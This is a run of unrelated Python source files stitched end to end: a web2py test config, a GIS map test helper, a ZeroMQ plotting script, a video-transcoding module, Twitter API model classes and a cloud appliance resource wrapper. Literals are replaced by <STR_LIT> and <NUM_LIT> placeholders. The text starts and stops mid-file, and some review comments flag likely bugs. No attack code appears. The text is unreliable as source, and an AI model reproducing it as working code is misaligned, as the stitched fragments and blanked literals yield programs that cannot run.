<NUM_LIT:0> ] ) <EOL> raise SystemExit <EOL> else : <EOL> sourceDirectory = args [ <NUM_LIT:1> ] <EOL> if not sourceDirectory : <EOL> usage ( sys . argv [ <NUM_LIT:0> ] ) <EOL> raise SystemExit <EOL> configDict = { '<STR_LIT>' : sourceDirectory } <EOL> configFile = None <EOL> if options and options [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == "<STR_LIT:-c>" : <EOL> configFile = options [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> print "<STR_LIT>" % filename <EOL> run ( configDict , outputFilename , configFile ) </s>
<s> WEB2PY_PASSWD = "<STR_LIT>" <EOL> SERVER = "<STR_LIT>" <EOL> APPNAME = "<STR_LIT>" <EOL> BROWSER = "<STR_LIT>" <EOL> VALID_USER = "<STR_LIT>" <EOL> VALID_PASSWORD = "<STR_LIT>" <EOL> HTTP_PROXY = "<STR_LIT>" <EOL> NO_PROXY = "<STR_LIT>" <EOL> DELAY = <NUM_LIT:0> <EOL> ADMIN_EMAIL = "<STR_LIT>" <EOL> ADMIN_PASSWORD = "<STR_LIT>" </s>
<s> from web2py_env import local_import , db , gis_map_tables <EOL> test_utils = local_import ( "<STR_LIT>" ) <EOL> s3gis = local_import ( "<STR_LIT>" ) <EOL> gis_map_tables ( ) <EOL> InsertedRecord = test_utils . InsertedRecord <EOL> AddedRole = test_utils . AddedRole <EOL> ExpectedException = test_utils . ExpectedException <EOL> Change = test_utils . Change <EOL> ExpectSessionWarning = test_utils . ExpectSessionWarning <EOL> def check_scripts ( actual_output , scripts , request ) : <EOL> substitutions = dict ( application_name = request . application ) <EOL> for script in scripts : <EOL> script_string = "<STR_LIT>" % ( <EOL> script % substitutions <EOL> ) <EOL> assert script_string in actual_output <EOL> def layer_test ( <EOL> db , <EOL> layer_table , <EOL> layer_data , <EOL> data_structure_lhs , <EOL> data_structure_rhs , <EOL> session , <EOL> request , <EOL> check_output = None , <EOL> scripts = [ ] , <EOL> ) : <EOL> with InsertedRecord ( db , layer_table , layer_data ) : <EOL> with AddedRole ( session , session . s3 . system_roles . MAP_ADMIN ) : <EOL> actual_output = str ( <EOL> s3gis . GIS ( ) . show_map ( <EOL> window = True , <EOL> catalogue_toolbar = True , <EOL> toolbar = True , <EOL> search = True , <EOL> catalogue_layers = True , <EOL> projection = <NUM_LIT> , <EOL> ) <EOL> ) <EOL> def found ( data_structure ) : <EOL> test_utils . assert_equal ( <EOL> data_structure_rhs , data_structure <EOL> ) <EOL> substitutions = dict ( application_name = request . application ) <EOL> for script in scripts : <EOL> script_string = "<STR_LIT>" % ( <EOL> script % substitutions <EOL> ) <EOL> assert script_string in actual_output <EOL> if check_output : <EOL> check_output ( actual_output ) <EOL> test_utils . find_JSON_format_data_structure ( <EOL> actual_output , <EOL> data_structure_lhs , <EOL> found , <EOL> not_found = test_utils . not_found , <EOL> cannot_parse_JSON = test_utils . cannot_parse_JSON <EOL> ) </s>
import json
import zmq
import pandas as pd
import pylab


def getstream(address):
    """Yield raw messages from a ZeroMQ SUB socket connected to *address*.

    NOTE(review): the context/socket are never closed; acceptable for a
    throwaway script, a leak if reused as a library.
    """
    c = zmq.Context()
    s = c.socket(zmq.SUB)
    s.setsockopt(zmq.SUBSCRIBE, '<STR_LIT>')  # subscribe to a topic prefix
    s.connect(address)
    while True:
        yield s.recv()


def populate(df, n, stream):
    """Append *n* rows to *df* from JSON messages pulled off *stream*.

    Messages are JSON objects; the row values are taken from their
    '<data>' entry, and messages without one are skipped.
    """
    m = df.shape[<NUM_LIT:0>]  # starting row count; stop after n new rows
    while True:
        # NOTE(review): two next() calls per iteration discard every other
        # message — looks like deliberate down-sampling, but confirm it is
        # not a leftover bug.
        next(stream)
        j = next(stream)
        d = json.loads(j).get('<STR_LIT:data>')
        if d:
            # Row-by-row .loc append is O(n^2) overall; fine for small n.
            df.loc[df.shape[<NUM_LIT:0>]] = d
        if df.shape[<NUM_LIT:0>] >= n + m:
            break


def plot_df(df):
    """Plot each column of *df* in its own stacked subplot (non-blocking)."""
    for i in range(df.shape[<NUM_LIT:1>]):
        pylab.subplot(df.shape[<NUM_LIT:1>], <NUM_LIT:1>, i + <NUM_LIT:1>)
        pylab.plot(df[i])
    pylab.show(block=False)


# Script entry: collect samples from the stream, plot them, then drop into
# an interactive shell for ad-hoc inspection.
address = '<STR_LIT>'
df = pd.DataFrame(columns=[<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>])
populate(df, <NUM_LIT>, getstream(address))
plot_df(df)
import IPython
IPython.embed()
from __future__ import with_statement
import logging
import os
import re
import shutil
from os.path import splitext
from . import image, utils
from .settings import get_thumb, Status
from .utils import call_subprocess, is_valid_html5_video


class SubprocessException(Exception):
    # Raised when an external conversion command fails.
    pass


def check_subprocess(cmd, source, outname):
    """Run *cmd* and raise SubprocessException on failure.

    On failure (non-zero return code) or KeyboardInterrupt, the partially
    written *outname* is removed before raising.
    """
    logger = logging.getLogger(__name__)
    try:
        returncode, stdout, stderr = call_subprocess(cmd)
    except KeyboardInterrupt:
        logger.debug('<STR_LIT>', outname)
        if os.path.isfile(outname):
            os.remove(outname)
        raise
    if returncode:
        logger.debug('<STR_LIT>', stdout)
        logger.debug('<STR_LIT>', stderr)
        if os.path.isfile(outname):
            logger.debug('<STR_LIT>', outname)
            os.remove(outname)
        raise SubprocessException('<STR_LIT>' + source)


def video_size(source):
    """Return the (width, height) of *source*.

    The size is scraped with a regex from the stderr of an external probe
    command; (0, 0) is returned when it cannot be parsed.
    """
    ret, stdout, stderr = call_subprocess(['<STR_LIT>', '<STR_LIT>', source])
    pattern = re.compile(r'<STR_LIT>')
    match = pattern.search(stderr)
    if match:
        x, y = int(match.groups()[<NUM_LIT:0>]), int(match.groups()[<NUM_LIT:1>])
    else:
        x = y = <NUM_LIT:0>
    return x, y


def generate_video(source, outname, settings, options=None):
    """Convert/resize *source* into *outname* per *settings*.

    When the destination extension already matches the source and the video
    fits within the configured maximum size, the file is copied unchanged.
    """
    logger = logging.getLogger(__name__)
    w_src, h_src = video_size(source)
    w_dst, h_dst = settings['<STR_LIT>']
    logger.debug('<STR_LIT>', w_src, h_src, w_dst, h_dst)
    base, src_ext = splitext(source)
    base, dst_ext = splitext(outname)
    if dst_ext == src_ext and w_src <= w_dst and h_src <= h_dst:
        logger.debug('<STR_LIT>')
        shutil.copy(source, outname)
        return
    # Resize on the limiting dimension so aspect ratio is preserved.
    if h_dst * w_src < h_src * w_dst:
        resize_opt = ['<STR_LIT>', "<STR_LIT>" % h_dst]
    else:
        resize_opt = ['<STR_LIT>', "<STR_LIT>" % w_dst]
    # Never upscale: drop the resize option when the source already fits.
    if w_src <= w_dst and h_src <= h_dst:
        resize_opt = []
    cmd = ['<STR_LIT>', '<STR_LIT>', source, '<STR_LIT>']
    if options is not None:
        cmd += options
    cmd += resize_opt + [outname]
    logger.debug('<STR_LIT>', '<STR_LIT:U+0020>'.join(cmd))
    check_subprocess(cmd, source, outname)


def generate_thumbnail(source, outname, box, delay, fit=True, options=None):
    """Extract one frame of *source* at *delay* into a temp file, then build
    the final thumbnail at *outname* via image.generate_thumbnail."""
    logger = logging.getLogger(__name__)
    tmpfile = outname + "<STR_LIT>"
    cmd = ['<STR_LIT>', '<STR_LIT>', source, '<STR_LIT>', '<STR_LIT>', '<STR_LIT:1>',
           '<STR_LIT>', delay, '<STR_LIT>', '<STR_LIT:1>', '<STR_LIT>', tmpfile]
    logger.debug('<STR_LIT>', '<STR_LIT:U+0020>'.join(cmd))
    # NOTE(review): the command writes *tmpfile*, but check_subprocess is
    # given *outname* to clean up on failure — confirm tmpfile was meant.
    check_subprocess(cmd, source, outname)
    image.generate_thumbnail(tmpfile, outname, box, fit, options)
    # NOTE(review): not in a finally block; tmpfile leaks if the thumbnail
    # generation above raises.
    os.unlink(tmpfile)


def process_video(filepath, outpath, settings):
    """Process a single video file into *outpath*.

    Copies (or symlinks) the file when it is already a usable HTML5 format,
    otherwise transcodes it to the configured format; then optionally
    generates a thumbnail. Returns Status.SUCCESS or Status.FAILURE.
    Exceptions are re-raised instead of swallowed when the logger is at
    DEBUG level.
    """
    logger = logging.getLogger(__name__)
    filename = os.path.split(filepath)[<NUM_LIT:1>]
    basename, ext = splitext(filename)
    try:
        if settings['<STR_LIT>'] and is_valid_html5_video(ext):
            outname = os.path.join(outpath, filename)
            utils.copy(filepath, outname, symlink=settings['<STR_LIT>'])
        else:
            valid_formats = ['<STR_LIT>', '<STR_LIT>']
            video_format = settings['<STR_LIT>']
            if video_format not in valid_formats:
                logger.error('<STR_LIT>',
                             valid_formats)
                raise ValueError
            outname = os.path.join(outpath, basename + '<STR_LIT:.>' + video_format)
            generate_video(filepath, outname, settings,
                           options=settings.get(video_format + '<STR_LIT>'))
    except Exception:
        if logger.getEffectiveLevel() == logging.DEBUG:
            raise
        else:
            return Status.FAILURE
    if settings['<STR_LIT>']:
        thumb_name = os.path.join(outpath, get_thumb(settings, filename))
        try:
            generate_thumbnail(
                outname, thumb_name, settings['<STR_LIT>'],
                settings['<STR_LIT>'], fit=settings['<STR_LIT>'],
                options=settings['<STR_LIT>'])
        except Exception:
            if logger.getEffectiveLevel() == logging.DEBUG:
                raise
            else:
                return Status.FAILURE
    return Status.SUCCESS
from tweepy1.error import TweepError
from tweepy1.utils import parse_datetime, parse_html_value, parse_a_href, parse_search_datetime, unescape_html


class ResultSet(list):
    """A list of model instances that also tracks max_id/since_id paging."""

    def __init__(self, max_id=None, since_id=None):
        super(ResultSet, self).__init__()
        self._max_id = max_id
        self._since_id = since_id

    @property
    def max_id(self):
        # An explicitly supplied value wins; otherwise derive it from items.
        if self._max_id:
            return self._max_id
        ids = self.ids()
        return max(ids) if ids else None

    @property
    def since_id(self):
        if self._since_id:
            return self._since_id
        ids = self.ids()
        return min(ids) if ids else None

    def ids(self):
        """Return the ids of all contained items that have an id attribute."""
        return [item.id for item in self if hasattr(item, '<STR_LIT:id>')]


class Model(object):
    """Base class for API models; subclasses implement parse()."""

    def __init__(self, api=None):
        self._api = api

    def __getstate__(self):
        # Drop the API handle when pickling (it is not picklable).
        pickle = dict(self.__dict__)
        try:
            del pickle['<STR_LIT>']
        except KeyError:
            pass
        return pickle

    @classmethod
    def parse(cls, api, json):
        """Parse one JSON object into a model instance (subclass hook)."""
        raise NotImplementedError

    @classmethod
    def parse_list(cls, api, json_list):
        """Parse a list of JSON objects into a ResultSet of instances,
        skipping falsy entries."""
        results = ResultSet()
        for obj in json_list:
            if obj:
                results.append(cls.parse(api, obj))
        return results


class Status(Model):

    @classmethod
    def parse(cls, api, json):
        """Build a Status, converting nested user/place/status objects and
        datetime fields; everything else is set verbatim."""
        status = cls(api)
        for k, v in json.items():
            if k == '<STR_LIT:user>':
                # Delegate to whatever user model the parser's factory uses.
                user_model = getattr(api.parser.model_factory, '<STR_LIT:user>')
                user = user_model.parse(api, v)
                setattr(status, '<STR_LIT>', user)
                setattr(status, '<STR_LIT:user>', user)
            elif k == '<STR_LIT>':
                setattr(status, k, parse_datetime(v))
            elif k == '<STR_LIT:source>':
                # HTML-wrapped sources get split into text and href parts.
                if '<STR_LIT:<>' in v:
                    setattr(status, k, parse_html_value(v))
                    setattr(status, '<STR_LIT>', parse_a_href(v))
                else:
                    setattr(status, k, v)
                    setattr(status, '<STR_LIT>', None)
            elif k == '<STR_LIT>':
                # Nested status payload is parsed recursively.
                setattr(status, k, Status.parse(api, v))
            elif k == '<STR_LIT>':
                if v is not None:
                    setattr(status, k, Place.parse(api, v))
                else:
                    setattr(status, k, None)
            else:
                setattr(status, k, v)
        # Keep the raw JSON payload available on the instance.
        setattr(status, '<STR_LIT>', json)
        return status

    def destroy(self):
        return self._api.destroy_status(self.id)

    def retweet(self):
        return self._api.retweet(self.id)

    def retweets(self):
        return self._api.retweets(self.id)

    def favorite(self):
        return self._api.create_favorite(self.id)


class User(Model):

    @classmethod
    def parse(cls, api, json):
        user = cls(api)
        for k, v in json.items():
            if k == '<STR_LIT>':
                setattr(user, k, parse_datetime(v))
            elif k == '<STR_LIT:status>':
                setattr(user, k, Status.parse(api, v))
            elif k == '<STR_LIT>':
                # Coerce to a strict boolean.
                if v is True:
                    setattr(user, k, True)
                else:
                    setattr(user, k, False)
            else:
                setattr(user, k, v)
        return user

    @classmethod
    def parse_list(cls, api, json_list):
        # The API may return either a bare list or a wrapper object.
        if isinstance(json_list, list):
            item_list = json_list
        else:
            item_list = json_list['<STR_LIT>']
        results = ResultSet()
        for obj in item_list:
            results.append(cls.parse(api, obj))
        return results

    def timeline(self, **kargs):
        return self._api.user_timeline(user_id=self.id, **kargs)

    def friends(self, **kargs):
        return self._api.friends(user_id=self.id, **kargs)

    def followers(self, **kargs):
        return self._api.followers(user_id=self.id, **kargs)

    def follow(self):
        self._api.create_friendship(user_id=self.id)
        self.following = True

    def unfollow(self):
        self._api.destroy_friendship(user_id=self.id)
        self.following = False

    def lists_memberships(self, *args, **kargs):
        return self._api.lists_memberships(user=self.screen_name, *args, **kargs)

    def lists_subscriptions(self, *args, **kargs):
        return self._api.lists_subscriptions(user=self.screen_name, *args, **kargs)

    def lists(self, *args, **kargs):
        return self._api.lists(user=self.screen_name, *args, **kargs)

    def followers_ids(self, *args, **kargs):
        return self._api.followers_ids(user_id=self.id, *args, **kargs)


class DirectMessage(Model):

    @classmethod
    def parse(cls, api, json):
        dm = cls(api)
        for k, v in json.items():
            # Two different keys both hold user payloads here.
            if k == '<STR_LIT>' or k == '<STR_LIT>':
                setattr(dm, k, User.parse(api, v))
            elif k == '<STR_LIT>':
                setattr(dm, k, parse_datetime(v))
            else:
                setattr(dm, k, v)
        return dm

    def destroy(self):
        return self._api.destroy_direct_message(self.id)


class Friendship(Model):

    @classmethod
    def parse(cls, api, json):
        """Return a (source, target) pair built from the relationship JSON."""
        relationship = json['<STR_LIT>']
        source = cls(api)
        for k, v in relationship['<STR_LIT:source>'].items():
            setattr(source, k, v)
        target = cls(api)
        for k, v in relationship['<STR_LIT:target>'].items():
            setattr(target, k, v)
        return source, target


class Category(Model):

    @classmethod
    def parse(cls, api, json):
        category = cls(api)
        for k, v in json.items():
            setattr(category, k, v)
        return category


class SavedSearch(Model):

    @classmethod
    def parse(cls, api, json):
        ss = cls(api)
        for k, v in json.items():
            if k == '<STR_LIT>':
                setattr(ss, k, parse_datetime(v))
            else:
                setattr(ss, k, v)
        return ss

    def destroy(self):
        return self._api.destroy_saved_search(self.id)


class SearchResults(ResultSet):

    @classmethod
    def parse(cls, api, json):
        """Build a SearchResults set from the search payload's metadata and
        status list."""
        metadata = json['<STR_LIT>']
        results = SearchResults(metadata.get('<STR_LIT>'), metadata.get('<STR_LIT>'))
        results.refresh_url = metadata.get('<STR_LIT>')
        results.completed_in = metadata.get('<STR_LIT>')
        results.query = metadata.get('<STR_LIT>')
        for status in json['<STR_LIT>']:
            results.append(Status.parse(api, status))
        return results


class List(Model):

    @classmethod
    def parse(cls, api, json):
        lst = List(api)
        for k, v in json.items():
            if k == '<STR_LIT:user>':
                setattr(lst, k, User.parse(api, v))
            elif k == '<STR_LIT>':
                setattr(lst, k, parse_datetime(v))
            else:
                setattr(lst, k, v)
        return lst

    @classmethod
    def parse_list(cls, api, json_list, result_set=None):
        # NOTE(review): result_set is accepted but never used.
        results = ResultSet()
        if isinstance(json_list, dict):
            json_list = json_list['<STR_LIT>']
        for obj in json_list:
            results.append(cls.parse(api, obj))
        return results

    def update(self, **kargs):
        return self._api.update_list(self.slug, **kargs)

    def destroy(self):
        return self._api.destroy_list(self.slug)

    def timeline(self, **kargs):
        return self._api.list_timeline(self.user.screen_name, self.slug, **kargs)

    def add_member(self, id):
        return self._api.add_list_member(self.slug, id)

    def remove_member(self, id):
        return self._api.remove_list_member(self.slug, id)

    def members(self, **kargs):
        return self._api.list_members(self.user.screen_name, self.slug, **kargs)

    def is_member(self, id):
        return self._api.is_list_member(self.user.screen_name, self.slug, id)

    def subscribe(self):
        return self._api.subscribe_list(self.user.screen_name, self.slug)

    def unsubscribe(self):
        return self._api.unsubscribe_list(self.user.screen_name, self.slug)

    def subscribers(self, **kargs):
        return self._api.list_subscribers(self.user.screen_name, self.slug, **kargs)

    def is_subscribed(self, id):
        return self._api.is_subscribed_list(self.user.screen_name, self.slug, id)


class Relation(Model):

    @classmethod
    def parse(cls, api, json):
        result = cls(api)
        for k, v in json.items():
            # A value field is a Status only for certain relation kinds.
            if k == '<STR_LIT:value>' and json['<STR_LIT>'] in ['<STR_LIT>', '<STR_LIT>']:
                setattr(result, k, Status.parse(api, v))
            elif k == '<STR_LIT>':
                setattr(result, k, Relation.parse_list(api, v))
            else:
                setattr(result, k, v)
        return result


class Relationship(Model):

    @classmethod
    def parse(cls, api, json):
        result = cls(api)
        for k, v in json.items():
            if k == '<STR_LIT>':
                # Expand the connections list into two boolean flags.
                setattr(result, '<STR_LIT>', '<STR_LIT>' in v)
                setattr(result, '<STR_LIT>', '<STR_LIT>' in v)
            else:
                setattr(result, k, v)
        return result


class JSONModel(Model):

    @classmethod
    def parse(cls, api, json):
        # Pass the raw JSON straight through.
        return json


class IDModel(Model):

    @classmethod
    def parse(cls, api, json):
        # Either a bare list of ids or a wrapper object holding one.
        if isinstance(json, list):
            return json
        else:
            return json['<STR_LIT>']


class BoundingBox(Model):

    @classmethod
    def parse(cls, api, json):
        result = cls(api)
        if json is not None:
            for k, v in json.items():
                setattr(result, k, v)
        return result

    def origin(self):
        """Return the first point of the box's first ring as a tuple."""
        return tuple(self.coordinates[<NUM_LIT:0>][<NUM_LIT:0>])

    def corner(self):
        """Return the point opposite origin() (third point of the ring)."""
        return tuple(self.coordinates[<NUM_LIT:0>][<NUM_LIT:2>])


class Place(Model):

    @classmethod
    def parse(cls, api, json):
        place = cls(api)
        for k, v in json.items():
            if k == '<STR_LIT>':
                if v is not None:
                    t = BoundingBox.parse(api, v)
                else:
                    t = v
                setattr(place, k, t)
            elif k == '<STR_LIT>':
                # Contained places are parsed recursively.
                setattr(place, k, Place.parse_list(api, v))
            else:
                setattr(place, k, v)
        return place

    @classmethod
    def parse_list(cls, api, json_list):
        # Either a bare list or a nested result wrapper.
        if isinstance(json_list, list):
            item_list = json_list
        else:
            item_list = json_list['<STR_LIT:result>']['<STR_LIT>']
        results = ResultSet()
        for obj in item_list:
            results.append(cls.parse(api, obj))
        return results


class ModelFactory(object):
    """Maps model names to the classes the parser instantiates."""
    status = Status
    user = User
    direct_message = DirectMessage
    friendship = Friendship
    saved_search = SavedSearch
    search_results = SearchResults
    category = Category
    list = List
    relation = Relation
    relationship = Relationship
    json = JSONModel
    ids = IDModel
    place = Place
    bounding_box = BoundingBox
import six
from ...errors.httpexception import HttpException
from ...errors.saklientexception import SaklientException
from ..client import Client
from .resource import Resource
from .icon import Icon
from .iface import Iface
from .swytch import Swytch
from ..enums.eapplianceclass import EApplianceClass
from ..enums.eavailability import EAvailability
from ..enums.eserverinstancestatus import EServerInstanceStatus
from ...util import Util
import saklient

# Rebind str to six.text_type so the str() conversions below are
# unicode-safe on Python 2.
str = six.text_type


class Appliance(Resource):
    """API resource wrapper for an appliance.

    Generated accessor style: each field is stored in an m_* attribute with
    an n_* dirty flag; (de)serialization is driven by those flags.
    """

    def _api_path(self):
        return "<STR_LIT>"

    def _root_key(self):
        return "<STR_LIT>"

    def _root_key_m(self):
        return "<STR_LIT>"

    def _class_name(self):
        return "<STR_LIT>"

    def _id(self):
        return self.get_id()

    def save(self):
        """Persist local (dirty) changes through the API."""
        return self._save()

    def reload(self):
        """Re-fetch this resource's state from the API."""
        return self._reload()

    def __init__(self, client, obj, wrapped=False):
        super(Appliance, self).__init__(client)
        Util.validate_type(client, "<STR_LIT>")
        Util.validate_type(wrapped, "<STR_LIT:bool>")
        self.api_deserialize(obj, wrapped)

    def _on_before_save(self, query):
        # Include the settings hash so the server can detect stale updates.
        Util.set_by_path(query, "<STR_LIT>", self.get_raw_settings_hash())

    def get_swytch(self):
        """Return the Swytch this appliance is attached to."""
        model = Util.create_class_instance("<STR_LIT>", [self._client])
        id = self.get_swytch_id()
        return model.get_by_id(id)

    def apply(self):
        self._client.request("<STR_LIT>", self._api_path() + "<STR_LIT:/>" + Util.url_encode(self._id()) + "<STR_LIT>")
        return self

    def boot(self):
        self._client.request("<STR_LIT>", self._api_path() + "<STR_LIT:/>" + Util.url_encode(self._id()) + "<STR_LIT>")
        return self

    def shutdown(self):
        self._client.request("<STR_LIT>", self._api_path() + "<STR_LIT:/>" + Util.url_encode(self._id()) + "<STR_LIT>")
        return self

    def stop(self):
        # Same endpoint as shutdown but with an extra flag in the body
        # (force-stop variant).
        self._client.request("<STR_LIT>", self._api_path() + "<STR_LIT:/>" + Util.url_encode(self._id()) + "<STR_LIT>", {
            '<STR_LIT>': True
        })
        return self

    def reboot(self):
        self._client.request("<STR_LIT>", self._api_path() + "<STR_LIT:/>" + Util.url_encode(self._id()) + "<STR_LIT>")
        return self

    def sleep_while_creating(self, timeoutSec=<NUM_LIT>):
        """Poll until the appliance leaves the migrating state.

        Returns True once it becomes available; False on timeout or when it
        enters any state other than migrating/available.
        """
        Util.validate_type(timeoutSec, "<STR_LIT:int>")
        step = <NUM_LIT:10>  # polling interval (seconds)
        while (<NUM_LIT:0> < timeoutSec):
            try:
                self.reload()
            except saklient.errors.httpexception.HttpException:
                pass  # transient API error: retry on the next poll
            a = self.get_availability()
            if a == EAvailability.available:
                return True
            if a != EAvailability.migrating:
                timeoutSec = <NUM_LIT:0>  # unexpected state: give up
            timeoutSec -= step
            if <NUM_LIT:0> < timeoutSec:
                Util.sleep(step)
        return False

    def sleep_until_up(self, timeoutSec=<NUM_LIT>):
        Util.validate_type(timeoutSec, "<STR_LIT:int>")
        return self.sleep_until(EServerInstanceStatus.up, timeoutSec)

    def sleep_until_down(self, timeoutSec=<NUM_LIT>):
        Util.validate_type(timeoutSec, "<STR_LIT:int>")
        return self.sleep_until(EServerInstanceStatus.down, timeoutSec)

    def sleep_until(self, status, timeoutSec=<NUM_LIT>):
        """Poll until the instance status equals *status*; False on timeout."""
        Util.validate_type(status, "<STR_LIT:str>")
        Util.validate_type(timeoutSec, "<STR_LIT:int>")
        step = <NUM_LIT:10>
        while (<NUM_LIT:0> < timeoutSec):
            try:
                self.reload()
            except saklient.errors.httpexception.HttpException:
                pass
            s = self.get_status()
            if s is None:
                # No reported status is treated as "down".
                s = EServerInstanceStatus.down
            if s == status:
                return True
            timeoutSec -= step
            if <NUM_LIT:0> < timeoutSec:
                Util.sleep(step)
        return False

    # ------- generated accessors (m_* value, n_* dirty flag) -------

    def get_id(self):
        return self.m_id

    id = property(get_id, None, None)

    def get_clazz(self):
        return self.m_clazz

    def set_clazz(self, v):
        Util.validate_type(v, "<STR_LIT:str>")
        if not self.is_new:
            # Immutable once the resource exists on the server.
            raise SaklientException("<STR_LIT>", "<STR_LIT>" + "<STR_LIT>")
        self.m_clazz = v
        self.n_clazz = True
        return self.m_clazz

    clazz = property(get_clazz, set_clazz, None)

    def get_name(self):
        return self.m_name

    def set_name(self, v):
        Util.validate_type(v, "<STR_LIT:str>")
        self.m_name = v
        self.n_name = True
        return self.m_name

    name = property(get_name, set_name, None)

    def get_description(self):
        return self.m_description

    def set_description(self, v):
        Util.validate_type(v, "<STR_LIT:str>")
        self.m_description = v
        self.n_description = True
        return self.m_description

    description = property(get_description, set_description, None)

    def get_tags(self):
        # Reading marks the field dirty: callers may mutate the list.
        self.n_tags = True
        return self.m_tags

    def set_tags(self, v):
        Util.validate_type(v, "<STR_LIT:list>")
        self.m_tags = v
        self.n_tags = True
        return self.m_tags

    tags = property(get_tags, set_tags, None)

    def get_icon(self):
        return self.m_icon

    def set_icon(self, v):
        Util.validate_type(v, "<STR_LIT>")
        self.m_icon = v
        self.n_icon = True
        return self.m_icon

    icon = property(get_icon, set_icon, None)

    def get_plan_id(self):
        return self.m_plan_id

    def set_plan_id(self, v):
        Util.validate_type(v, "<STR_LIT:int>")
        if not self.is_new:
            raise SaklientException("<STR_LIT>", "<STR_LIT>" + "<STR_LIT>")
        self.m_plan_id = v
        self.n_plan_id = True
        return self.m_plan_id

    plan_id = property(get_plan_id, set_plan_id, None)

    def get_ifaces(self):
        return self.m_ifaces

    ifaces = property(get_ifaces, None, None)

    def get_raw_annotation(self):
        return self.m_raw_annotation

    def set_raw_annotation(self, v):
        if not self.is_new:
            raise SaklientException("<STR_LIT>", "<STR_LIT>" + "<STR_LIT>")
        self.m_raw_annotation = v
        self.n_raw_annotation = True
        return self.m_raw_annotation

    raw_annotation = property(get_raw_annotation, set_raw_annotation, None)

    def get_raw_settings(self):
        # Reading marks dirty: the settings object may be mutated in place.
        self.n_raw_settings = True
        return self.m_raw_settings

    def set_raw_settings(self, v):
        self.m_raw_settings = v
        self.n_raw_settings = True
        return self.m_raw_settings

    raw_settings = property(get_raw_settings, set_raw_settings, None)

    def get_raw_settings_hash(self):
        return self.m_raw_settings_hash

    raw_settings_hash = property(get_raw_settings_hash, None, None)

    def get_status(self):
        return self.m_status

    status = property(get_status, None, None)

    def get_service_class(self):
        return self.m_service_class

    service_class = property(get_service_class, None, None)

    def get_availability(self):
        return self.m_availability

    availability = property(get_availability, None, None)

    def get_swytch_id(self):
        return self.m_swytch_id

    swytch_id = property(get_swytch_id, None, None)

    def api_deserialize_impl(self, r):
        """Populate the m_* fields from the API representation *r*.

        A missing key leaves that field None and marks the record
        incomplete; every n_* dirty flag is reset to False.
        """
        self.is_new = r is None
        if self.is_new:
            r = {}
        self.is_incomplete = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_id = None if Util.get_by_path(r, "<STR_LIT>") is None else str(Util.get_by_path(r, "<STR_LIT>"))
        else:
            self.m_id = None
            self.is_incomplete = True
        self.n_id = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_clazz = None if Util.get_by_path(r, "<STR_LIT>") is None else str(Util.get_by_path(r, "<STR_LIT>"))
        else:
            self.m_clazz = None
            self.is_incomplete = True
        self.n_clazz = False
        if Util.exists_path(r, "<STR_LIT:Name>"):
            self.m_name = None if Util.get_by_path(r, "<STR_LIT:Name>") is None else str(Util.get_by_path(r, "<STR_LIT:Name>"))
        else:
            self.m_name = None
            self.is_incomplete = True
        self.n_name = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_description = None if Util.get_by_path(r, "<STR_LIT>") is None else str(Util.get_by_path(r, "<STR_LIT>"))
        else:
            self.m_description = None
            self.is_incomplete = True
        self.n_description = False
        if Util.exists_path(r, "<STR_LIT>"):
            if Util.get_by_path(r, "<STR_LIT>") is None:
                self.m_tags = []
            else:
                self.m_tags = []
                for t in Util.get_by_path(r, "<STR_LIT>"):
                    v1 = None
                    v1 = None if t is None else str(t)
                    self.m_tags.append(v1)
        else:
            self.m_tags = None
            self.is_incomplete = True
        self.n_tags = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_icon = None if Util.get_by_path(r, "<STR_LIT>") is None else Icon(self._client, Util.get_by_path(r, "<STR_LIT>"))
        else:
            self.m_icon = None
            self.is_incomplete = True
        self.n_icon = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_plan_id = None if Util.get_by_path(r, "<STR_LIT>") is None else int(str(Util.get_by_path(r, "<STR_LIT>")))
        else:
            self.m_plan_id = None
            self.is_incomplete = True
        self.n_plan_id = False
        if Util.exists_path(r, "<STR_LIT>"):
            if Util.get_by_path(r, "<STR_LIT>") is None:
                self.m_ifaces = []
            else:
                self.m_ifaces = []
                for t in Util.get_by_path(r, "<STR_LIT>"):
                    v2 = None
                    v2 = None if t is None else Iface(self._client, t)
                    self.m_ifaces.append(v2)
        else:
            self.m_ifaces = None
            self.is_incomplete = True
        self.n_ifaces = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_raw_annotation = Util.get_by_path(r, "<STR_LIT>")
        else:
            self.m_raw_annotation = None
            self.is_incomplete = True
        self.n_raw_annotation = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_raw_settings = Util.get_by_path(r, "<STR_LIT>")
        else:
            self.m_raw_settings = None
            self.is_incomplete = True
        self.n_raw_settings = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_raw_settings_hash = None if Util.get_by_path(r, "<STR_LIT>") is None else str(Util.get_by_path(r, "<STR_LIT>"))
        else:
            self.m_raw_settings_hash = None
            self.is_incomplete = True
        self.n_raw_settings_hash = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_status = None if Util.get_by_path(r, "<STR_LIT>") is None else str(Util.get_by_path(r, "<STR_LIT>"))
        else:
            self.m_status = None
            self.is_incomplete = True
        self.n_status = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_service_class = None if Util.get_by_path(r, "<STR_LIT>") is None else str(Util.get_by_path(r, "<STR_LIT>"))
        else:
            self.m_service_class = None
            self.is_incomplete = True
        self.n_service_class = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_availability = None if Util.get_by_path(r, "<STR_LIT>") is None else str(Util.get_by_path(r, "<STR_LIT>"))
        else:
            self.m_availability = None
            self.is_incomplete = True
        self.n_availability = False
        if Util.exists_path(r, "<STR_LIT>"):
            self.m_swytch_id = None if Util.get_by_path(r, "<STR_LIT>") is None else str(Util.get_by_path(r, "<STR_LIT>"))
        else:
            self.m_swytch_id = None
            self.is_incomplete = True
        self.n_swytch_id = False

    def api_serialize_impl(self, withClean=False):
        """Build the API representation of this object.

        When *withClean* is False only dirty (n_*) fields are emitted, and
        missing creation-required fields on a new object raise a
        SaklientException listing them.
        """
        Util.validate_type(withClean, "<STR_LIT:bool>")
        missing = []
        ret = {}
        if withClean or self.n_id:
            Util.set_by_path(ret, "<STR_LIT>", self.m_id)
        if withClean or self.n_clazz:
